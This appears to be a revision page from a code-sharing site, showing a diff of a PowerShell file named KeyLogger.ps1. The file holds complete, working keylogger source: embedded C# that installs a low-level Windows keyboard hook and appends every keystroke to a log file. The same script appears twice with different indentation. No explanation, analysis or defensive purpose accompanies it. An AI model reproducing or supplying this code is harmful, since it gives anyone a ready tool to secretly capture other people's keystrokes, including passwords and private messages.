sancarn · January 14, 2020 00:07 · sancarn · Sep 12, 2021 · 0xFFFFFFFFFFFFFFFFFFFFF · Mar 18, 2022
diff --git a/_README.MD b/_README.MD
diff --git a/KeyLogger.ps1 b/KeyLogger.ps1
 Add-Type -TypeDefinition @"
 using System;
 using System.IO;
 using System.Diagnostics;
 using System.Runtime.InteropServices;
 using System.Windows.Forms;

 namespace KeyLogger {
  public static class Program {
    private const int WH_KEYBOARD_LL = 13;
    private const int WM_KEYDOWN = 0x0100;

    private const string logFileName = "log.txt";
    private static StreamWriter logFile;

    private static HookProc hookProc = HookCallback;
    private static IntPtr hookId = IntPtr.Zero;

    public static void Main() {
      logFile = File.AppendText(logFileName);
      logFile.AutoFlush = true;

      hookId = SetHook(hookProc);
      Application.Run();
      UnhookWindowsHookEx(hookId);
    }

    private static IntPtr SetHook(HookProc hookProc) {
      IntPtr moduleHandle = GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName);
      return SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, moduleHandle, 0);
    }

    private delegate IntPtr HookProc(int nCode, IntPtr wParam, IntPtr lParam);

    private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) {
      if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN) {
        int vkCode = Marshal.ReadInt32(lParam);
        logFile.WriteLine((Keys)vkCode);
      }

      return CallNextHookEx(hookId, nCode, wParam, lParam);
    }

    [DllImport("user32.dll")]
    private static extern IntPtr SetWindowsHookEx(int idHook, HookProc lpfn, IntPtr hMod, uint dwThreadId);

    [DllImport("user32.dll")]
    private static extern bool UnhookWindowsHookEx(IntPtr hhk);

    [DllImport("user32.dll")]
    private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

    [DllImport("kernel32.dll")]
    private static extern IntPtr GetModuleHandle(string lpModuleName);
  }
 }
 "@ -ReferencedAssemblies System.Windows.Forms

 [KeyLogger.Program]::Main();
	Add-Type -TypeDefinition @"
	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Windows.Forms;

	namespace KeyLogger {
	public static class Program {
	private const int WH_KEYBOARD_LL = 13;
	private const int WM_KEYDOWN = 0x0100;

	private const string logFileName = "log.txt";
	private static StreamWriter logFile;

	private static HookProc hookProc = HookCallback;
	private static IntPtr hookId = IntPtr.Zero;

	public static void Main() {
	logFile = File.AppendText(logFileName);
	logFile.AutoFlush = true;

	hookId = SetHook(hookProc);
	Application.Run();
	UnhookWindowsHookEx(hookId);
	}

	private static IntPtr SetHook(HookProc hookProc) {
	IntPtr moduleHandle = GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName);
	return SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, moduleHandle, 0);
	}

	private delegate IntPtr HookProc(int nCode, IntPtr wParam, IntPtr lParam);

	private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) {
	if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN) {
	int vkCode = Marshal.ReadInt32(lParam);
	logFile.WriteLine((Keys)vkCode);
	}

	return CallNextHookEx(hookId, nCode, wParam, lParam);
	}

	[DllImport("user32.dll")]
	private static extern IntPtr SetWindowsHookEx(int idHook, HookProc lpfn, IntPtr hMod, uint dwThreadId);

	[DllImport("user32.dll")]
	private static extern bool UnhookWindowsHookEx(IntPtr hhk);

	[DllImport("user32.dll")]
	private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

	[DllImport("kernel32.dll")]
	private static extern IntPtr GetModuleHandle(string lpModuleName);
	}
	}
	"@ -ReferencedAssemblies System.Windows.Forms

	[KeyLogger.Program]::Main();